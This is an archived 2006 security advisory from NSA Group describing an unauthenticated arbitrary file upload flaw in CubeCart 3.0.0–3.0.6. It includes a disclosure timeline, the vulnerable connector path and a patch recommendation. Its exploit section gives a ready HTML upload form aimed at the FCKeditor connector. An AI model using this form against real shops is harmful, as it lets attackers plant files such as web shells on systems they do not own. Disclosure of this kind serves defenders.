NSAG-197-23.02.2006.txt

2006-02-26T00:00:00
ID PACKETSTORM:44178
Type packetstorm
Reporter nsag.ru
Modified 2006-02-26T00:00:00

Description

                                        
                                            `Advisory:  
NSAG-¹197-23.02.2006  
  
Research:  
NSA Group [Russian company on Audit of safety & Network security]  
  
Site of Research:  
http://www.nsag.ru or http://www.nsag.org  
  
Product:   
CubeCart 3.0.0 – 3.0.6  
  
Site of manufacturer:  
http://www.cubecart.com  
  
The status:   
19/11/2005 - Publication is postponed.   
19/11/2005 - Manufacturer is notified.   
21/11/2005 - Answer of the manufacturer.   
24/12/2005 - Patch.   
29/12/2005 - New version CubeCart 3.0.7.   
21/02/2006 - Publication of vulnerability.  
  
Original Advisory:  
http://www.nsag.ru/vuln/892.html  
  
Risk:   
Critical  
  
Description:   
Vulnerability exists because of insufficient check of authorization of the user   
in the   
script/includes/rte/editor/filemanager/browser/default/connectors/php/connector.php.   
Procedure of authorization include ("../includes/auth.inc.php" is not connected.   
The removed user can by means of specially generated URL to load any files on target   
system.   
  
Influence:   
Vulnerability allows the removed user loading of any files on system.  
  
Exploit:   
<form   
action="http://host/cubedir/admin/includes/rte/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/"   
method="POST" enctype="multipart/form-data">   
File Upload<br>   
<input id="txtFileUpload" type="file" name="NewFile">   
<br>   
<input type="submit" value="Upload">   
</form>  
  
Decision:  
Download patch or update new version 3.0.7  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   
Our company is the independent auditor of the software in market IT.  
At present independent audit of the software becomes the standard practice  
and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors!  
  
  
www.nsag.ru   
«Nemesis» © 2006  
------------------------------------   
Nemesis Security Audit Group © 2006.  
  
  
  
  
`